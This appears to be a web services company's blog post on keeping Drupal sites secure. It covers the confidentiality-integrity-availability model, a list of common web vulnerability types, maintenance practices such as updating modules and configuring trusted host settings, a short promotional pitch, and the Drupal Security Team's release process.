Most websites only need to worry about automated security attacks. These kind of attacks have a very low success rate, but they still happen. High risk websites have to worry about someone trying to actively hack their site. Usually this happens because of a few reasons:
- Your website has information worth stealing (ex. ecommerce site with membership records)
- Your website has a lot of visitors
- Someone wants to shut your website down
What is Security?
- Confidentiality: In information security, confidentiality is the property, that information is not made available or disclosed to unauthorized individuals, entities or processes
- Integrity: In information security, data integrity means maintaining and assuring the accuracy and completeness of data over its entire life-cycle. This means that data cannot be modified in an unauthorized or undetected manner. This is not the same thing as referential integrity in databases, although it can be viewed as a special case of consistency as understood in the classic ACID model of transaction processing. Information security systems typically provide message integrity in addition to data confidentiality.
- Availability: For any information system to serve its purpose, the information must be available when it is needed. This means that the computing systems used to store and process the information, the security controls used to protect it, and the communication channels used to access it must be functioning correctly. High availability systems aim to remain available at all times, preventing service disruptions due to power outages, hardware failures, and system upgrades. Ensuring availability also involves preventing denial-of-service attacks, such as a flood of incoming messages to the target system essentially forcing it to shut down.
Common Website Security Issues
- Cross-Site Scripting
- Injection Flaws
- Malicious File Extension
- Insecure Direct Object Reference
- Cross-Site Request Forgery
- Information Leakage
- Insecure Cryptographic Storage
- Insecure Communications
- Failure to Restrict URL Access
- Unvalidated Input
How to Maintain Drupal Security
- Run the latest version of Drupal: Drupal updates contain new features, bug and security fixes. Updates will help your site remain safe against common, easy-to-exploit vulnerabilities. Did you know that Drupal 6 is no longer supported?
- Run the latest version of modules: Modules you've installed on your site can contain vulnerabilities that will increase the chance of your site being hacked. Make sure your modules are up-to-date.
- Be selective in choosing your modules: The majority of security advisories in Drupal are associated with contributed modules. If you have a website that contains sensitive data, be wary of the security of contributed modules.
- Remove inactive users: Users, especially administrators and others who have the ability to modify content, usually choose weak passwords. To limit any actions that can be performed, remove inactive users or change their roles.
- Use Drupal's Status Report functionality: Drupal's Status Report page provides you with visibility into the important security controls you should be using on your site. For example, you can set up a list of Trusted Host Settings to prevent the possibility of a host header attack from occuring
- Configure Trusted Host Settings: Drupal tries to automatically figure out the base URL of the site. This can result in a host header attack because the 'host' HTTP header can be forged by an attacker.
- Keep an eye on your logs: Drupal has a built-in log viewer. By keeping an eye on logs, you can reduce the effects of a security breach by catching early warning signs such as failed login attempts.
- Enable HTTPS: HTTPS should be used whenever a user is passing sensitive information to the web server and vice-versa, not just when your site contains elements such as shopping carts and Internet banking.
- You should also have a testing environment set up and ready to evaluate updates for deployment. Drupal core updates typically come out on Wednesdays.
- If you modify any Drupal core components, make sure to have a vendor branch management strategy to keep track of all your changes and still be able to upgrade.
- Have code reviews
- If you have very sensitive documents, store them separately from other resources. Attackers can use one site to get access to other sites on the same server. Isolate your projects by site and sensitivity level
- You can work with Drupal's Security Team to keep your project secure. Subscribe to Drupal's security notification lists to stay updated on what the team is working on, what the latest issues are, and how to keep your site secure.
- If your team is new to Drupal, work with a vendor. Interested in our security or migration services? Sanmita provides a broad spectrum of web design services, ranging from consulting to production and maintenance of websites and web applications. Contact us today to learn more about how we can help secure or upgrade your website.
The Drupal Security Team
The Security Release Process
- Vulnerability in code discovered - Anyone can identify and report a security issue to the team. To report an issue, read and follow the Drupal guide on how to report a security issue.
- Issue reported privately to Security team - Security issues are handled confidentially unless a vulnerability requires advanced permissions or access to exploit. In this case, the team encourages maintainers to fix these issues publicly because they don't represent a true threat on their own.
- Issue reviewed, potential impact on all supported Drupal releases evaluated - There are two major release series supported at any given time. Currently, Drupal is running versions 7.x and 8.x. Drupal 6 will no longer be supported. You should always run an update to the most current version of the series you're using. We'll come back to this later.
- If the threat is valid, Security Team mobilized for analysis. Maintainer notified
- Security team provides support. Maintainer fixes the issue - Maintainers, testers and other interested parties collaborate to find a solution on a private, secure issue tracker.
- Fixes reviewed and discussed - Steps 1 through 4 continue until the Security Team and module maintainer are satisfied with the security issue.
- Code patches created and tested - the team tests the new code to make sure it doesn't introduce any new security issues
- New, fixed versions made available on Drupal.org
- Security advisory written and published via website, newsletter, RSS feeds for core and contributed modules, Twitter, etc.
- New versions deployed on all sites - You can find the "available updates" report on your Drupal site. This will tell you if your Drupal core and contributed module versions are up-to-date. It will give you download links and release notes for any new versions. These updates are not automatic, so remember to check and update regularly to keep your site as secure as possible.